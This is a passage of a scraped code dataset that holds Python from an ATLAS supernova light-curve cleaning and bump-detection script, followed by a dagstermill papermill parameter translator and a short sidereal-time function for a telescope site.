'Ngood':fluxstatparams['Ngood'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Mask':0})\n\t\t\t\tlc.update_mask_col(self.flags['avg_badday'], range_i, control_index=control_index)\n\t\t\t\tavglc.update_mask_col(self.flags['avg_badday'], [avglc_index], control_index=control_index)\n\n\t\t\t\tmjd += self.mjd_bin_size\n\t\t\t\tcontinue\n\t\t\t\n\t\t\t# average good measurements\n\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('uJy', noisecol=lc.dflux_colnames[control_index], indices=range_good_i, Nsigma=3.0, median_firstiteration=True)\n\t\t\tfluxstatparams = deepcopy(lc.lcs[control_index].statparams)\n\n\t\t\tif fluxstatparams['mean'] is None or len(fluxstatparams['ix_good']) < 1:\n\t\t\t\tlc.update_mask_col(self.flags['avg_badday'], range_i, control_index=control_index)\n\t\t\t\tavglc.update_mask_col(self.flags['avg_badday'], [avglc_index], control_index=control_index)\n\t\t\t\tmjd += self.mjd_bin_size\n\t\t\t\tcontinue\n\n\t\t\t# get average mjd\n\t\t\t# TO DO: SHOULD NOISECOL HERE BE DUJY OR NONE??\n\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('MJD', noisecol=lc.dflux_colnames[control_index], indices=fluxstatparams['ix_good'], Nsigma=0, median_firstiteration=False)\n\t\t\tavg_mjd = lc.lcs[control_index].statparams['mean']\n\n\t\t\t# add row to averaged light curve\n\t\t\tavglc.lcs[control_index].add2row(avglc_index, {'MJD':avg_mjd, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'uJy':fluxstatparams['mean'], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'duJy':fluxstatparams['mean_err'], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'stdev':fluxstatparams['stdev'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'x2':fluxstatparams['X2norm'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Nclip':fluxstatparams['Nclip'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Ngood':fluxstatparams['Ngood'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Mask':0})\n\t\t\t\n\t\t\t# flag clipped measurements in lc\n\t\t\tif len(fluxstatparams['ix_clip']) > 0:\n\t\t\t\tlc.update_mask_col(self.flags['avg_ixclip'], fluxstatparams['ix_clip'], control_index=control_index)\n\t\t\t\n\t\t\t# if small number within this bin, flag measurements\n\t\t\tif len(range_good_i) < 3:\n\t\t\t\tlc.update_mask_col(self.flags['avg_smallnum'], range_good_i, control_index=control_index) # TO DO: CHANGE TO RANGE_I??\n\t\t\t\tavglc.update_mask_col(self.flags['avg_smallnum'], [avglc_index], control_index=control_index)\n\t\t\t# else check sigmacut bounds and flag\n\t\t\telse:\n\t\t\t\tis_bad = False\n\t\t\t\tif fluxstatparams['Ngood'] < self.g_Ngood_min:\n\t\t\t\t\tis_bad = True\n\t\t\t\tif fluxstatparams['Nclip'] > self.g_Nclip_max:\n\t\t\t\t\tis_bad = True\n\t\t\t\tif not(fluxstatparams['X2norm'] is None) and fluxstatparams['X2norm'] > self.g_x2_max:\n\t\t\t\t\tis_bad = True\n\t\t\t\tif is_bad:\n\t\t\t\t\tlc.update_mask_col(self.flags['avg_badday'], range_i, control_index=control_index)\n\t\t\t\t\tavglc.update_mask_col(self.flags['avg_badday'], [avglc_index], control_index=control_index)\n\n\t\t\tmjd += self.mjd_bin_size\n\t\t\n\t\t# convert flux to magnitude and dflux to dmagnitude\n\t\tavglc.lcs[control_index].flux2mag('uJy','duJy','m','dm', zpt=23.9, upperlim_Nsigma=self.flux2mag_sigmalimit)\n\n\t\tavglc = self.drop_extra_columns(avglc)\n\n\t\tfor col in ['Nclip','Ngood','Nexcluded','Mask']: \n\t\t\tavglc.lcs[control_index].t[col] = avglc.lcs[control_index].t[col].astype(np.int32)\n\n\t\treturn lc, avglc\n\n\t# average the SN light curve and, if necessary, control light curves\n\tdef average(self, lc, avglc):\n\t\tfor control_index in range(self.num_controls+1):\n\t\t\t# only average control light curves if detecting pre-SN bumps\n\t\t\tif (not(self.detect_bumps) or (self.detect_bumps and not(self.apply_to_controls))) and control_index > 0:\n\t\t\t\tbreak\n\n\t\t\tlc, avglc = self.average_lc(lc, avglc, control_index)\n\n\t\ts = 'Total percent of data flagged: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['avg_badday']))/len(avglc.lcs[0].t))\n\t\tprint(f'# {s}')\n\t\toutput = f'\\n\\n{s}.'\n\n\t\treturn lc, avglc, output\n\n\t# add simulated bump if necessary and apply rolling gaussian weighted sum to light curve\n\tdef apply_gaussian(self, avglc, control_index=0, simparams=None, filt=None):\n\t\tif self.start_mjd is None:\n\t\t\tself.start_mjd = avglc.lcs[control_index].t['MJDbin'].iloc[0]\n\t\tif self.end_mjd is None:\n\t\t\tself.end_mjd = avglc.lcs[control_index].t['MJDbin'].iloc[-1]\n\t\tix = avglc.lcs[control_index].ix_inrange(colnames=['MJDbin'],lowlim=self.start_mjd, uplim=self.end_mjd)\n\t\tif len(ix) <= 0:\n\t\t\traise RuntimeError('ERROR: specified MJD range less than or equal to 0!')\n\t\tprint(f'# Applying detection to specified MJD bin range: {avglc.lcs[control_index].t[\"MJDbin\"].iloc[ix[0]]} to {avglc.lcs[control_index].t[\"MJDbin\"].iloc[ix[-1]]}')\n\n\t\tgood_ix = avglc.lcs[control_index].ix_unmasked('Mask',self.flags['avg_badday'])\n\n\t\t# make sure there are no lingering simulations\n\t\tdropcols=[]\n\t\tfor col in ['uJysim','SNRsim','simLC','SNRsimsum']:\n\t\t\tif col in avglc.lcs[control_index].t.columns:\n\t\t\t\tdropcols.append(col)\n\t\tif len(dropcols) > 0:\n\t\t\tavglc.lcs[control_index].t.drop(columns=dropcols,inplace=True)\n\n\t\tavglc.lcs[control_index].t.loc[ix, 'SNR'] = 0.0\n\t\tavglc.lcs[control_index].t.loc[good_ix,'SNR'] = avglc.lcs[control_index].t.loc[good_ix,'uJy']/avglc.lcs[control_index].t.loc[good_ix,'duJy']\n\n\t\tif not(simparams is None):\n\t\t\tpeakMJDs = simparams['sim_peakMJD'].split(',')\n\t\t\t\n\t\t\t# get the simulated gaussian\n\t\t\tmjds = avglc.lcs[control_index].t.loc[good_ix,'MJD']\n\t\t\tavglc.lcs[control_index].t.loc[good_ix,'uJysim'] = avglc.lcs[control_index].t.loc[good_ix,'uJy']\n\t\t\tavglc.lcs[control_index].t.loc[ix,'simLC'] = 0.0\n\t\t\tfor peakMJD in peakMJDs:\n\t\t\t\tpeakMJD = float(peakMJD)\n\t\t\t\tprint(f'## Adding simulated gaussian at peak MJD {peakMJD:0.2f} with apparent magnitude {simparams[\"sim_appmag\"]:0.2f}, sigma- of {simparams[\"sim_sigma_minus\"]:0.2f}, and sigma+ of {simparams[\"sim_sigma_plus\"]:0.2f}')\n\n\t\t\t\t# get simulated gaussian flux and add to light curve flux\n\t\t\t\tsimflux = gauss2lc(mjds, peakMJD, simparams['sim_sigma_minus'], simparams['sim_sigma_plus'], app_mag=simparams['sim_appmag'])\n\t\t\t\tavglc.lcs[control_index].t.loc[good_ix,'uJysim'] += simflux\n\n\t\t\t\t# get the simulated lc for all MJDs\n\t\t\t\tsimflux_all = gauss2lc(avglc.lcs[control_index].t.loc[ix,'MJDbin'], peakMJD, simparams['sim_sigma_minus'], simparams['sim_sigma_plus'], app_mag=simparams['sim_appmag'])\n\t\t\t\tavglc.lcs[control_index].t.loc[ix,'simLC'] += simflux_all\n\n\t\t\t# make sure all bad rows have SNRsim = 0.0 so they have no impact on the rolling SNRsum\n\t\t\tavglc.lcs[control_index].t.loc[ix,'SNRsim'] = 0.0\n\t\t\t# include simflux in the SNR\n\t\t\tavglc.lcs[control_index].t.loc[good_ix,'SNRsim'] = avglc.lcs[control_index].t.loc[good_ix,'uJysim']/avglc.lcs[control_index].t.loc[good_ix,'duJy']\n\n\t\tgaussian_sigma = round(self.gaussian_sigma/self.mjd_bin_size)\n\t\twindowsize = int(6*gaussian_sigma)\n\t\thalfwindowsize = int(windowsize*0.5)+1\n\t\tprint(f'## Sigma (days): {self.gaussian_sigma:0.2f}; MJD bin size (days): {self.mjd_bin_size:0.2f}; sigma (bins): {gaussian_sigma:0.2f}; window size (bins): {windowsize}')\n\n\t\t# calculate the rolling SNR sum\n\t\t\n\t\tdataindices = np.array(range(len(avglc.lcs[control_index].t.loc[ix])) + np.full(len(avglc.lcs[control_index].t.loc[ix]), halfwindowsize))\n\t\t\n\t\ttemp = pd.Series(np.zeros(len(avglc.lcs[control_index].t.loc[ix]) + 2*halfwindowsize), name='SNR', dtype=np.float64)\n\t\ttemp[dataindices] = avglc.lcs[control_index].t.loc[ix,'SNR']\n\n\t\tSNRsum = temp.rolling(windowsize, center=True, win_type='gaussian').sum(std=gaussian_sigma)\n\t\tavglc.lcs[control_index].t.loc[ix,'SNRsum'] = list(SNRsum[dataindices])\n\t\t\n\t\tnorm_temp = pd.Series(np.zeros(len(avglc.lcs[control_index].t.loc[ix]) + 2*halfwindowsize), name='norm', dtype=np.float64)\n\t\tnorm_temp[np.array(range(len(avglc.lcs[control_index].t.loc[ix])) + np.full(len(avglc.lcs[control_index].t.loc[ix]), halfwindowsize))] = np.ones(len(avglc.lcs[control_index].t.loc[ix]))\n\t\tnorm_temp_sum = norm_temp.rolling(windowsize, center=True, win_type='gaussian').sum(std=gaussian_sigma)\n\t\tavglc.lcs[control_index].t.loc[ix,'SNRsumnorm'] = list(SNRsum.loc[dataindices] / norm_temp_sum.loc[dataindices] * max(norm_temp_sum.loc[dataindices]))\n\n\t\t# calculate the rolling SNR sum for SNR with simflux\n\t\tif not(simparams is None):\n\t\t\ttemp = pd.Series(np.zeros(len(avglc.lcs[control_index].t.loc[ix]) + 2*halfwindowsize), name='SNRsim', dtype=np.float64)\n\t\t\ttemp[dataindices] = avglc.lcs[control_index].t.loc[ix,'SNRsim']\n\t\t\tSNRsimsum = temp.rolling(windowsize, center=True, win_type='gaussian').sum(std=gaussian_sigma)\n\t\t\tavglc.lcs[control_index].t.loc[ix,'SNRsimsum'] = list(SNRsimsum.loc[dataindices])\n\n\t\treturn avglc\n\n\t# begin output text file with information on cuts and flags\n\tdef begin_readme(self, args, obj_index):\n\t\tf = open(f'{self.output_dir}/{args.tnsnames[obj_index]}/README.md','w+')\n\t\tf.write(f\"# SN {args.tnsnames[obj_index]} Light Curve Cleaning and Averaging\")\n\t\tf.write(f'\\n\\nThe ATLAS SN light curves are separated by filter (orange and cyan) and labelled as such in the file name. Averaged light curves contain an additional number in the file name that represents the MJD bin size used. Control light curves are located in the \"controls\" subdirectory and follow the same naming scheme, only with their control index added after the SN name.')\n\t\t\n\t\tf.write(f'\\n\\nThe following details the file names for each of the light curve versions:')\n\t\tf.write(f'\\n\\t- SN light curves: {args.tnsnames[obj_index]}.o.lc.txt and {args.tnsnames[obj_index]}.c.lc.txt')\n\t\tif self.averaging:\n\t\t\tf.write(f'\\n\\t- Averaged light curves: {args.tnsnames[obj_index]}.o.{self.mjd_bin_size:0.2f}days.lc.txt and {args.tnsnames[obj_index]}.c.{self.mjd_bin_size:0.2f}days.lc.txt')\n\t\tif self.controls:\n\t\t\tf.write(f'\\n\\t- Control light curves, where X=001,...,{self.num_controls:03d}: {args.tnsnames[obj_index]}_iX.o.lc.txt and {args.tnsnames[obj_index]}_iX.c.lc.txt')\n\n\t\tf.write(f'\\n\\nThe following summarizes the hex values in the \"Mask\" column of each light curve for each cut applied (see below sections for more information on each cut): ')\n\t\tif self.uncertainties:\n\t\t\tf.write(f'\\n\\t- Uncertainty cut: {hex(self.flags[\"uncertainty\"])}')\n\t\tif self.chisquares:\n\t\t\tf.write(f'\\n\\t- Chi-square cut: {hex(self.flags[\"chisquare\"])}')\n\t\tif self.controls:\n\t\t\tf.write(f'\\n\\t- Control light curve cut: {hex(self.flags[\"controls_bad\"])}')\n\t\tif self.averaging:\n\t\t\tf.write(f'\\n\\t- Bad day (for averaged light curves): {hex(self.flags[\"avg_badday\"])}')\n\n\t\treturn f\n\n\t# add information about each cut to output text file\n\tdef add_to_readme(self, f, lc, filt, final_cut=None, estimate_true_uncertainties_output=None, chisquare_output=None, uncertainty_output=None, templates_output=None, control_output=None, averaging_output=None):\n\t\tf.write(f'\\n\\n## FILTER: {filt}')\n\n\n\t\tif not(self.skip_tc):\n\t\t\tf.write('\\n\\n### Correction for ATLAS reference template changes')\n\t\t\tf.write(f'\\nWe take into account ATLAS\\'s periodic replacement of the difference image reference templates, which may cause step discontinuities in flux. Two template changes have been recorded at MJDs 58417 and 58882.')\n\t\t\tf.write(templates_output)\n\n\t\tif self.uncertainties:\n\t\t\tf.write(f'\\n\\n### Uncertainty cut')\n\t\t\tf.write(f'\\nWe flag measurements with an uncertainty (column name \"duJy\") value above {self.uncertainty_cut:0.2f} with hex value {hex(self.flags[\"uncertainty\"])}.')\n\t\t\tf.write(uncertainty_output)\n\n\t\tif self.estimate_true_uncertainties:\n\t\t\tf.write(f'\\n\\n### Estimating true uncertainties')\n\t\t\tf.write(f'\\nThis procedure attempts to account for an extra noise source in the data by estimating the true typical uncertainty, deriving the additional systematic uncertainty, and lastly applying this extra noise to a new uncertainty column \"duJy_new\". This new uncertainty column will be used in the cuts following this portion.')\n\t\t\tf.write(estimate_true_uncertainties_output)\n\n\t\tif self.chisquares:\n\t\t\tf.write(f'\\n\\n### Chi-square cut')\n\t\t\tf.write(f'\\nWe flag measurements with a chi-square (column name \"chi/N\") value above {final_cut:0.2f} with hex value {hex(self.flags[\"chisquare\"])}.')\n\t\t\tf.write(chisquare_output)\n\n\t\tif self.controls:\n\t\t\tf.write(f'\\n\\n### Control light curve cut')\n\t\t\tf.write(f'\\nThe control light curve cut examines each SN epoch and its corresponding control light curve measurements at that epoch, applies a 3-sigma-clipped average, calculates statistics, and then cuts bad epochs based on those returned statistics.')\n\t\t\tf.write(f'\\n\\nFor the given epoch, we flag the SN measurement for which the returned control statistics fulfill any of the following criteria with the hex value {hex(self.flags[\"controls_bad\"])}: ')\n\t\t\tf.write(f'\\n\\t- A returned chi-square > {self.c_x2_max:0.2f}')\n\t\t\tf.write(f'\\n\\t- A returned abs(flux/dflux) > {self.stn_max:0.2f}')\n\t\t\tf.write(f'\\n\\t- Number of clipped/\"bad\" measurements in the 3σ-clipped average > {self.c_Nclip_max}')\n\t\t\tf.write(f'\\n\\t- Number of used/\"good\" measurements in the 3σ-clipped average < {self.c_Ngood_min}')\n\t\t\tf.write(control_output)\n\n\t\tf.write(f'\\n\\n### After the uncertainty, chi-square, and control light curve cuts are applied, the light curves are resaved with the new \"Mask\" column.')\n\n\t\tif self.averaging:\n\t\t\tf.write(f'\\n\\n### Averaging light curves and cutting bad days')\n\t\t\tf.write(f'\\nFor each MJD bin of size {self.mjd_bin_size:0.2f} day(s), we calculate the 3σ-clipped average of any SN measurements falling within that bin and use that average as our flux for that bin. However, out of all exposures within this MJD bin, only measurements not cut in the previous methods are averaged in the 3σ-clipped average cut. (The exception to this statement would be the case that all 4 measurements are cut in previous methods; in this case, they are averaged anyway and flagged as a bad bin.')\n\t\t\tf.write(f'\\n\\nThen we flag any measurements in the SN light curve for the given epoch for which statistics fulfill any of the following criteria with the hex value {hex(self.flags[\"avg_badday\"])}: ') \n\t\t\tf.write(f'\\n\\t- A returned chi-square > {self.g_x2_max}')\n\t\t\tf.write(f'\\n\\t- Number of measurements averaged < {self.g_Ngood_min}')\n\t\t\tf.write(f'\\n\\t- Number of measurements clipped > {self.g_Nclip_max}')\n\t\t\tf.write(f'\\n\\nThe averaged light curves are then saved in a new file with the MJD bin size added to the filename.')\n\t\t\tf.write(averaging_output)\n\n\t\treturn f\n\n\tdef get_lc_data(self, lc, snlist_index):\n\t\tif snlist_index == -1:\n\t\t\tlc.get_tns_data(self.tns_api_key, self.tns_id, self.bot_name)\n\n\t\t\t# add row to self.snlist\n\t\t\tself.snlist.newrow({'tnsname':lc.tnsname, \n\t\t\t\t\t\t\t\t'ra':lc.ra, \n\t\t\t\t\t\t\t\t'dec':lc.dec, \n\t\t\t\t\t\t\t\t'discovery_date':lc.discdate, \n\t\t\t\t\t\t\t\t'closebright_ra':np.nan, \n\t\t\t\t\t\t\t\t'closebright_dec':np.nan})\n\t\t\t\n\t\t\tsnlist_index = len(self.snlist.t) - 1\n\t\t\n\t\tlc.ra = self.snlist.t.loc[snlist_index,'ra']\n\t\tlc.dec = self.snlist.t.loc[snlist_index,'dec']\n\t\tlc.discdate = self.snlist.t.loc[snlist_index,'discovery_date']\n\t\tprint(f'RA: {lc.ra}, Dec: {lc.dec}, discovery date: {lc.discdate}')\n\n\t\treturn lc, snlist_index\n\n\tdef cut_loop(self):\n\t\targs = self.define_args().parse_args()\n\t\tself.load_settings(args)\n\n\t\tfor obj_index in range(0,len(args.tnsnames)):\n\t\t\tprint(f'\\nCOMMENCING LOOP FOR SN {args.tnsnames[obj_index]}')\n\n\t\t\tf = self.begin_readme(args, obj_index)\n\t\t\t\n\t\t\tif args.plot:\n\t\t\t\tplot = plot_atlas_lc(tnsname=args.tnsnames[obj_index], \n\t\t\t\t\t\t\t\t\t output_dir=self.output_dir, \n\t\t\t\t\t\t\t\t\t args=args, \n\t\t\t\t\t\t\t\t\t flags=self.flags)\n\t\t\tif self.detect_bumps:\n\t\t\t\tbumps_plot = plot_atlas_lc(tnsname=args.tnsnames[obj_index], \n\t\t\t\t\t\t\t\t\t\t output_dir=self.output_dir, \n\t\t\t\t\t\t\t\t\t\t args=args, \n\t\t\t\t\t\t\t\t\t\t add2filename='detect_bumps', \n\t\t\t\t\t\t\t\t\t\t flags=self.flags)\n\n\t\t\t# check if SN information exists in snlist.txt\n\t\t\tsnlist_index = -1\n\t\t\tsnlist_ix = self.snlist.ix_equal(colnames=['tnsname'],val=args.tnsnames[obj_index])\n\t\t\tif len(snlist_ix) > 0:\n\t\t\t\tif len(snlist_ix > 1):\n\t\t\t\t\t# drop duplicate rows\n\t\t\t\t\tself.snlist.t.drop(snlist_ix[1:])\n\t\t\t\tsnlist_index = snlist_ix[0]\n\n\t\t\tfor filt in ['o','c']:\n\t\t\t\tprint(f'\\nFILTER SET: {filt}')\n\t\t\t\tlc = atlas_lc(tnsname=args.tnsnames[obj_index])\n\t\t\t\tlc.load(self.output_dir, filt, num_controls=self.num_controls)\n\n\t\t\t\tlc = self.verify_mjds(lc)\n\t\t\t\tif len(lc.lcs[0].t) < 1:\n\t\t\t\t\tprint('WARNING: Empty light curve--skipping any cuts/averaging/other...')\n\t\t\t\t\tcontinue\n\n\t\t\t\tlc, snlist_index = self.get_lc_data(lc, snlist_index)\n\t\t\t\tlc = self.drop_extra_columns(lc)\n\t\t\t\tlc, templates_output = self.correct_for_template(lc)\n\t\t\t\tif args.plot:\n\t\t\t\t\tplot.set(lc=lc, filt=filt)\n\t\t\t\t\tplot.plot_og_lc()\n\n\t\t\t\t# uncertainty cut\n\t\t\t\tuncertainty_output = None\n\t\t\t\tif self.uncertainties:\n\t\t\t\t\tlc, uncertainty_output = self.apply_uncertainty_cut(lc)\n\t\t\t\t\tif args.plot:\n\t\t\t\t\t\tplot.plot_uncertainty_cut(add2title=f'at {self.uncertainty_cut:0.2f}')\n\n\t\t\t\t# estimate true uncertainties\n\t\t\t\testimate_true_uncertainties_output = None\n\t\t\t\tif self.estimate_true_uncertainties:\n\t\t\t\t\tlc, estimate_true_uncertainties_output, do_plot = self.apply_true_uncertainties(lc)\n\t\t\t\t\tif args.plot and do_plot:\n\t\t\t\t\t\tplot.plot_uncertainty_estimations()\n\n\t\t\t\t# add flux/dflux column\n\t\t\t\tprint('Adding uJy/duJy column to light curve...')\n\t\t\t\tlc.lcs[0].t['uJy/duJy'] = lc.lcs[0].t['uJy']/lc.lcs[0].t[lc.dflux_colnames[0]]\n\t\t\t\tlc.lcs[0].t = lc.lcs[0].t.replace([np.inf, -np.inf], np.nan)\n\n\t\t\t\t# chi-square cut\n\t\t\t\tchisquare_output = None\n\t\t\t\tfinal_cut = None\n\t\t\t\tif self.chisquares:\n\t\t\t\t\tif args.plot:\n\t\t\t\t\t\tlc, final_cut, chisquare_output, plot = self.apply_chisquare_cut(args, lc, plot)\n\t\t\t\t\t\tplot.plot_chisquare_cut(add2title=f'at {final_cut:0.2f}')\n\t\t\t\t\telse:\n\t\t\t\t\t\tlc, final_cut, chisquare_output = self.apply_chisquare_cut(args, lc)\n\n\t\t\t\t# control light curve cut\n\t\t\t\tcontrol_output = None\n\t\t\t\tif self.controls:\n\t\t\t\t\tlc, control_output = self.apply_control_cut(lc)\n\t\t\t\t\tif args.plot:\n\t\t\t\t\t\tplot.plot_controls_cut(self.num_controls)\n\n\t\t\t\tif args.plot and (self.chisquares or self.uncertainties or self.controls):\n\t\t\t\t\tplot.plot_all_cuts()\n\n\t\t\t\t# average and cut bad days\n\t\t\t\taveraging_output = None\n\t\t\t\tif self.averaging:\n\t\t\t\t\tavglc = atlas_lc(tnsname=lc.tnsname, is_averaged=True, mjd_bin_size=self.mjd_bin_size)\n\t\t\t\t\tavglc.discdate = lc.discdate\n\n\t\t\t\t\tlc, avglc, averaging_output = self.average(lc, avglc)\n\n\t\t\t\t\t# plot averaged light curve\n\t\t\t\t\tif args.plot:\n\t\t\t\t\t\tplot.set(lc=avglc, filt=filt)\n\t\t\t\t\t\tplot.plot_averaged_lc()\n\n\t\t\t\t# detect pre-SN bumps \n\t\t\t\tif self.detect_bumps:\n\t\t\t\t\tprint('\\nNow detecting pre-SN bumps...')\n\n\t\t\t\t\tif not self.averaging:\n\t\t\t\t\t\traise RuntimeError('ERROR: Cannot detect pre-SN bumps without averaging! Please add -g to your command in order to average light curves.')\n\t\t\t\t\tif self.apply_to_controls and self.num_controls <= 0:\n\t\t\t\t\t\traise RuntimeError('ERROR: Cannot apply to control light curves without at least one control light curve! Check the num_controls field in config file.')\n\n\t\t\t\t\tif not(self.appmags is None):\n\t\t\t\t\t\tfor appmag in self.appmags:\n\t\t\t\t\t\t\tsimparams = {'sim_peakMJD':args.sim_gaussian[0],'sim_appmag':float(appmag),'sim_sigma_minus':float(args.sim_gaussian[2]),'sim_sigma_plus':float(args.sim_gaussian[2])}\n\t\t\t\t\t\t\tprint(f'# Simulation apparent magnitude: {simparams[\"sim_appmag\"]:0.2f} mag')\n\t\t\t\t\t\t\tprint(f'# Simulation peak MJD(s): {simparams[\"sim_peakMJD\"].split(\",\")}')\n\t\t\t\t\t\t\tprint(f'# Simulation gaussian sigma: {simparams[\"sim_sigma_plus\"]:0.2f} days')\n\n\t\t\t\t\t\t\tfor control_index in range(self.num_controls+1):\n\t\t\t\t\t\t\t\t# only add simulated gaussian(s) to SN light curve when applying rolling sum\n\t\t\t\t\t\t\t\tif control_index == 0:\n\t\t\t\t\t\t\t\t\tprint(f'# Applying gaussian weighted rolling sum to SN light curve...')\n\t\t\t\t\t\t\t\t\tavglc = self.apply_gaussian(avglc, control_index=control_index, simparams=simparams)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tprint(f'# Applying gaussian weighted rolling sum to control light curve {control_index:03d}...')\n\t\t\t\t\t\t\t\t\tavglc = self.apply_gaussian(avglc, control_index=control_index)\n\n\t\t\t\t\t\t\tbumps_plot = plot_atlas_lc(tnsname=lc.tnsname, output_dir=self.output_dir, args=args, add2filename=f'detect_bumps.{filt}.appmag{simparams[\"sim_appmag\"]:0.2f}', flags=self.flags)\n\t\t\t\t\t\t\tbumps_plot.set(lc=avglc, filt=filt)\n\t\t\t\t\t\t\tbumps_plot.plot_sim_bumps(simparams=simparams)\n\t\t\t\t\t\t\tbumps_plot.plot_snr(simparams=simparams)\n\t\t\t\t\t\t\tif self.apply_to_controls:\n\t\t\t\t\t\t\t\tbumps_plot.plot_all_snr(simparams=simparams)\n\t\t\t\t\t\t\tbumps_plot.save()\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor control_index in range(self.num_controls+1):\n\t\t\t\t\t\t\tif control_index == 0:\n\t\t\t\t\t\t\t\tprint(f'# Applying gaussian weighted rolling sum to SN light curve...')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprint(f'# Applying gaussian weighted rolling sum to control light curve {control_index:03d}...')\n\t\t\t\t\t\t\tavglc = self.apply_gaussian(avglc, control_index=control_index, filt=filt)\n\n\t\t\t\t\t\tbumps_plot.set(lc=avglc, filt=filt)\n\t\t\t\t\t\tbumps_plot.plot_sim_bumps()\n\t\t\t\t\t\tbumps_plot.plot_snr()\n\t\t\t\t\t\tif self.apply_to_controls:\n\t\t\t\t\t\t\tbumps_plot.plot_all_snr()\n\n\t\t\t\t# drop extra control lc cut columns\n\t\t\t\tlc = self.drop_extra_columns(lc)\n\t\t\t\t# save lc with new 'Mask' column\n\t\t\t\tlc.save(self.output_dir, filt=filt, overwrite=self.overwrite)\n\n\n\t\t\t\t# drop extra columns in averaged lc\n\t\t\t\tif self.averaging:\n\t\t\t\t\tavglc = self.drop_extra_columns(avglc) \n\t\t\t\t\t# save averaged light curve\n\t\t\t\t\tavglc.save(self.output_dir, filt=filt, overwrite=self.overwrite, keep_empty_bins=self.keep_empty_bins)\n\n\t\t\t\tf = self.add_to_readme(f, lc, filt, final_cut=final_cut, \n\t\t\t\t\t\t\t\t\t\t\t\t\tuncertainty_output=uncertainty_output,\n\t\t\t\t\t\t\t\t\t\t\t\t\testimate_true_uncertainties_output=estimate_true_uncertainties_output,\n\t\t\t\t\t\t\t\t\t\t\t\t\ttemplates_output=templates_output,\n\t\t\t\t\t\t\t\t\t\t\t\t\tchisquare_output=chisquare_output, \n\t\t\t\t\t\t\t\t\t\t\t\t\tcontrol_output=control_output,\n\t\t\t\t\t\t\t\t\t\t\t\t\taveraging_output=averaging_output)\n\n\t\t\tf.close()\n\n\t\t\tif args.plot:\n\t\t\t\tplot.save()\n\t\t\tif self.detect_bumps and self.appmags is None:\n\t\t\t\tbumps_plot.save()\n\n\t\t# save snlist.txt with any new rows\n\t\tfilename = f'{self.output_dir}/{self.snlist_filename}'\n\t\tprint(f'Saving SN list at {filename}')\n\t\tself.snlist.write(filename)\n\nif __name__ == \"__main__\":\n\tclean_atlas_lc = clean_atlas_lc()\n\tclean_atlas_lc.cut_loop()\n","repo_name":"srest2021/atlaslc_jupyter","sub_path":"clean_atlas_lc.py","file_name":"clean_atlas_lc.py","file_ext":"py","file_size_in_byte":72641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9895045227","text":"import papermill\nimport papermill.translators\nfrom dagster import _seven\n\nRESERVED_INPUT_NAMES = [\n \"__dm_context\",\n \"__dm_dagstermill\",\n \"__dm_executable_dict\",\n \"__dm_json\",\n \"__dm_pipeline_run_dict\",\n \"__dm_node_handle_kwargs\",\n \"__dm_instance_ref_dict\",\n \"__dm_step_key\",\n \"__dm_input_names\",\n]\n\nINJECTED_BOILERPLATE = \"\"\"\n# Injected parameters\nfrom dagster import seven as __dm_seven\nimport dagstermill as __dm_dagstermill\ncontext = __dm_dagstermill._reconstitute_job_context(\n **{{\n key: __dm_seven.json.loads(value)\n for key, value\n in {job_context_args}.items()\n }}\n)\n\"\"\"\n\n\nclass DagsterTranslator(papermill.translators.PythonTranslator):\n @classmethod\n def codify(cls, parameters, comment=None):\n # comment is not used but is a required argument on newer versions of papermill\n assert \"__dm_context\" in parameters\n assert \"__dm_executable_dict\" in parameters\n assert \"__dm_pipeline_run_dict\" in parameters\n assert \"__dm_node_handle_kwargs\" in parameters\n assert \"__dm_instance_ref_dict\" in parameters\n assert \"__dm_step_key\" in parameters\n assert \"__dm_input_names\" in parameters\n\n context_args = parameters[\"__dm_context\"]\n job_context_args = dict(\n executable_dict=parameters[\"__dm_executable_dict\"],\n job_run_dict=parameters[\"__dm_pipeline_run_dict\"],\n node_handle_kwargs=parameters[\"__dm_node_handle_kwargs\"],\n instance_ref_dict=parameters[\"__dm_instance_ref_dict\"],\n step_key=parameters[\"__dm_step_key\"],\n **context_args,\n )\n\n for key in job_context_args:\n job_context_args[key] = _seven.json.dumps(job_context_args[key])\n\n content = INJECTED_BOILERPLATE.format(job_context_args=job_context_args)\n\n for input_name in parameters[\"__dm_input_names\"]:\n dm_load_input_call = f\"__dm_dagstermill._load_input_parameter('{input_name}')\"\n content += f\"{cls.assign(input_name, dm_load_input_call)}\\n\"\n\n return content\n\n\npapermill.translators.papermill_translators.register(\"python\", DagsterTranslator)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagstermill/dagstermill/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"4234489036","text":"##-------------------------------------------------------------------------\n## Sidereal Time\n##-------------------------------------------------------------------------\n# Author: Inaki Ordonez-Etxeberria\n#\n# Return the Sidereal Time (in hours) from Latitude and Longitude of the observatory, and date of observation. If the parameters are empty, the function assumes the position of the Isaac Newton Telescope in La Palma, at the moment of execution of the function. \n\ndef SiderealTime(lat = '28.775867', lon = '-17.89733', date = 'now'):\n observatory = ephem.Observer()\n observatory.lon = lon\n observatory.lat = lat\n observatory.elevation = 2328\n if date == 'now':\n observatory.date = ephem.now()\n else:\n observatory.date = ephem.Date(date)\n return degrees(observatory.sidereal_time()) / 15\n","repo_name":"inakioe/SiderealTime","sub_path":"siderealtime.py","file_name":"siderealtime.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33627839334","text":"#!/usr/bin/env 